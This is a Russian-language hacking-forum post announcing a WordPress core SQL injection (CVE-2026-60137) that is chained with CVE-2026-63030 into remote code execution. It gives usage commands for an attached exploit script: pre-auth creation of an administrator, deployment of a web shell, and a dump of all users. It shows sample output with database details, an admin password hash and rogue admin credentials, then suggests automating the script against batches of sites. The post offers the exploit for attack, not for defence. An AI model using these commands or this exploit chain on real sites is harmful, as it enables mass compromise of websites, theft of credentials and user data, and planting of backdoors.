• Добро пожаловать на сайт - Forumteam.bet !

    Что бы просматривать темы форума необходимо зарегестрироваться или войти в свой аккаунт.

    Группа в телеграме (подпишитесь, что бы не потерять нас) - ForumTeam Chat [Подписатся]
    Связь с администратором - @ftmadmin

CVE-2026-60137: новая SQL-инъекция в WordPress Core

DarkholdRT

Пользователь на проверке
На проверке
Регистрация
24.07.26
Новая уязвимость CVE-2026-60137, которая бьет по ядру WordPress. Проблема связана с параметром author__not_in в WP_Query: при определённых условиях злоумышленник может выполнить SQL-инъекцию и получить доступ к данным из базы сайта.

Сама уязвимость слабая, но связке с CVE-2026-63030 SQL-инъекция может стать первым этапом атаки, которая в итоге приводит к удалённому выполнению кода (RCE). Это уже позволяет полностью скомпрометировать сайт.
Уязвимость затронула отдельные версии Wordpress, однако это большой разброс.
  • 6.8 до 6.8.6;
  • 6.9 до 6.9.5;
  • 7.0 до 7.0.2.
WP_Query позволяет фильтровать записи по различным параметрам. Один из них — author__not_in, который должен содержать массив идентификаторов авторов, записи которых нужно исключить. Проблема CVE-2026-60137 заключается в том, что при определённых условиях данные, попадающие в author__not_in, могут быть недостаточно проверены перед включением в SQL-запрос. Если разработчик плагина или темы передаёт туда пользовательский ввод без дополнительной валидации, появляется возможность SQL Injection.

Ниже будет прикреплён Python файл, в котором используется уязвимость.

Запуск скрипта в таком формате:
Makefile:
# Полная цепочка — создание учетной записи администратора (предварительная аутентификация)
python3 cve_2026_63030.py --url https://target.com

# Только проверка (подтверждение уязвимости)
python3 cve_2026_63030.py --url https://target.com --check

# Полная цепочка + развертывание веб-оболочки RCE
python3 cve_2026_63030.py --url https://target.com --rce id

# Выгрузка всех пользователей с помощью UNION-извлечения
python3 cve_2026_63030.py --url https://target.com --dump-users

В случае успешной атаки на выходе должно получиться:
Код:
+======================================================================+
  Target :  https://target.com
  Mode   :  FULL CHAIN
+======================================================================+

[STEP 1] Verifying batch endpoint + route-confusion desync
  [+] Batch endpoint reachable (HTTP 207)
  [+] Desync confirmed (markers: parse_path_failed, rest_batch_not_allowed)

[STEP 2] UNION SQLi — database reconnaissance
  [+] Database version  : 8.0.46
  [+] Database user     : wp_user@localhost
  [+] Database name     : wordpress_db
  [+] Table prefix      : wp_
  [+] Admin login       : admin
  [+] Admin hash        : $P$B5xK3mwBxY2dOe/MKWx5VXGihwSUO
  [+] Admin user ID     : 1

[STEP 3] Creating a fresh administrator via oEmbed post-cache poisoning
  [*] Seeding oEmbed cache with 3 loopback URLs...
  [+] oEmbed cache IDs: [6, 7, 8]
  [*] Submitting changeset poison + user creation...
  [+] Admin created -- username: wp2_a1b2c3d4  password: Wp2!e5f6g7h8i9j0

+======================================================================+
|  EXPLOITATION COMPLETE                                               |
+======================================================================+
  Admin : wp2_a1b2c3d4 / Wp2!e5f6g7h8i9j0
  Login : https://target.com/wp-login.php


При необходимости код можно автоматизировать на обработку пакета сайтов для поиска уязвимости, сортировки и запуска нового этапа - эксплойта.
 
Сверху Снизу